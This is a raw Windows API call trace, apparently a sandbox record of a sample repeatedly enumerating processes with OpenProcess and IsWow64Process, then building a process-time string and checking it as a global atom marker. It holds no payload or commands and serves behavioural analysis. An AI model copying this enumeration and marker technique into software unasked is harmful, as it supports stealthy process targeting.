	[0114.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0114.064] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.064] CloseHandle (hObject=0x698) returned 1
	[0114.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0114.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0114.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0114.064] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.064] CloseHandle (hObject=0x698) returned 1
	[0114.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0114.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0114.065] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.065] CloseHandle (hObject=0x698) returned 1
	[0114.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0114.065] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.065] CloseHandle (hObject=0x698) returned 1
	[0114.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0114.065] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.065] CloseHandle (hObject=0x698) returned 1
	[0114.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0114.065] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.065] CloseHandle (hObject=0x698) returned 1
	[0114.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0114.065] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.065] CloseHandle (hObject=0x698) returned 1
	[0114.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0114.066] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.066] CloseHandle (hObject=0x698) returned 1
	[0114.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0114.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0114.066] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.066] CloseHandle (hObject=0x698) returned 1
	[0114.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0114.066] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.066] CloseHandle (hObject=0x698) returned 1
	[0114.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0114.066] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.066] CloseHandle (hObject=0x698) returned 1
	[0114.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0114.067] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.067] CloseHandle (hObject=0x698) returned 1
	[0114.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0114.068] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.069] CloseHandle (hObject=0x698) returned 1
	[0114.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0114.069] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.069] CloseHandle (hObject=0x698) returned 1
	[0114.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0114.069] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.069] CloseHandle (hObject=0x698) returned 1
	[0114.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0114.070] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.070] CloseHandle (hObject=0x698) returned 1
	[0114.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0114.070] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.070] CloseHandle (hObject=0x698) returned 1
	[0114.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0114.070] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.070] CloseHandle (hObject=0x698) returned 1
	[0114.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0114.070] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.070] CloseHandle (hObject=0x698) returned 1
	[0114.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0114.070] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.070] CloseHandle (hObject=0x698) returned 1
	[0114.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0114.071] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.071] CloseHandle (hObject=0x698) returned 1
	[0114.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0114.071] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.071] CloseHandle (hObject=0x698) returned 1
	[0114.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0114.071] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.071] CloseHandle (hObject=0x698) returned 1
	[0114.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0114.071] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.071] CloseHandle (hObject=0x698) returned 1
	[0114.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0114.072] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.072] CloseHandle (hObject=0x698) returned 1
	[0114.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0114.072] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.072] CloseHandle (hObject=0x698) returned 1
	[0114.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0114.072] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.072] CloseHandle (hObject=0x698) returned 1
	[0114.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0114.072] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.072] CloseHandle (hObject=0x698) returned 1
	[0114.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0114.072] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.072] CloseHandle (hObject=0x698) returned 1
	[0114.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0114.073] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.073] CloseHandle (hObject=0x698) returned 1
	[0114.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.073] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.073] CloseHandle (hObject=0x698) returned 1
	[0114.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.073] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.073] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0114.074] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0114.074] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0114.074] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.074] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0114.074] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.075] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0114.075] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0114.075] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0114.166] CloseHandle (hObject=0x698) returned 1
	[0114.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0114.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0114.166] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.166] CloseHandle (hObject=0x698) returned 1
	[0114.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0114.166] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.166] CloseHandle (hObject=0x698) returned 1
	[0114.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0114.166] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.166] CloseHandle (hObject=0x698) returned 1
	[0114.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0114.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0114.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0114.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0114.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0114.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0114.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0114.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0114.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0114.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0114.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0114.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0114.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0114.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0114.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0114.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0114.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0114.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0114.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0114.341] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.341] CloseHandle (hObject=0x698) returned 1
	[0114.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0114.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0114.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0114.342] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.342] CloseHandle (hObject=0x698) returned 1
	[0114.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0114.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0114.342] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.342] CloseHandle (hObject=0x698) returned 1
	[0114.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0114.342] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.342] CloseHandle (hObject=0x698) returned 1
	[0114.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0114.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.343] CloseHandle (hObject=0x698) returned 1
	[0114.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0114.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.343] CloseHandle (hObject=0x698) returned 1
	[0114.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0114.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.343] CloseHandle (hObject=0x698) returned 1
	[0114.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0114.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.343] CloseHandle (hObject=0x698) returned 1
	[0114.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0114.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0114.344] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.344] CloseHandle (hObject=0x698) returned 1
	[0114.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0114.344] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.344] CloseHandle (hObject=0x698) returned 1
	[0114.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0114.344] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.344] CloseHandle (hObject=0x698) returned 1
	[0114.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0114.344] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.344] CloseHandle (hObject=0x698) returned 1
	[0114.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0114.345] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.345] CloseHandle (hObject=0x698) returned 1
	[0114.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0114.345] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.345] CloseHandle (hObject=0x698) returned 1
	[0114.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0114.345] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.345] CloseHandle (hObject=0x698) returned 1
	[0114.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0114.345] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.345] CloseHandle (hObject=0x698) returned 1
	[0114.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0114.345] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.345] CloseHandle (hObject=0x698) returned 1
	[0114.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0114.346] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.346] CloseHandle (hObject=0x698) returned 1
	[0114.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0114.346] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.346] CloseHandle (hObject=0x698) returned 1
	[0114.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0114.346] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.346] CloseHandle (hObject=0x698) returned 1
	[0114.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0114.346] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.346] CloseHandle (hObject=0x698) returned 1
	[0114.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0114.346] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.347] CloseHandle (hObject=0x698) returned 1
	[0114.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0114.347] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.347] CloseHandle (hObject=0x698) returned 1
	[0114.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0114.347] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.347] CloseHandle (hObject=0x698) returned 1
	[0114.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0114.347] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.347] CloseHandle (hObject=0x698) returned 1
	[0114.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0114.347] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.347] CloseHandle (hObject=0x698) returned 1
	[0114.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0114.348] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.348] CloseHandle (hObject=0x698) returned 1
	[0114.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0114.348] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.348] CloseHandle (hObject=0x698) returned 1
	[0114.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0114.348] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.348] CloseHandle (hObject=0x698) returned 1
	[0114.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0114.348] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.348] CloseHandle (hObject=0x698) returned 1
	[0114.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.351] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.351] CloseHandle (hObject=0x698) returned 1
	[0114.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.352] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.352] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0114.352] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0114.352] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0114.353] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.353] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0114.353] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.353] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0114.353] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0114.353] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0114.353] CloseHandle (hObject=0x698) returned 1
	[0114.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0114.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0114.354] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.354] CloseHandle (hObject=0x698) returned 1
	[0114.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0114.354] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.354] CloseHandle (hObject=0x698) returned 1
	[0114.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0114.354] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.354] CloseHandle (hObject=0x698) returned 1
	[0114.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0114.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0114.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0114.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0114.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0114.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0114.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0114.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0114.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0114.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0114.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0114.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0114.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0114.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0114.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0114.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0114.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0114.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0114.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0114.442] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.442] CloseHandle (hObject=0x698) returned 1
	[0114.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0114.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0114.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0114.442] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.442] CloseHandle (hObject=0x698) returned 1
	[0114.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0114.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0114.443] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.443] CloseHandle (hObject=0x698) returned 1
	[0114.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0114.443] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.443] CloseHandle (hObject=0x698) returned 1
	[0114.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0114.443] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.443] CloseHandle (hObject=0x698) returned 1
	[0114.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0114.443] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.443] CloseHandle (hObject=0x698) returned 1
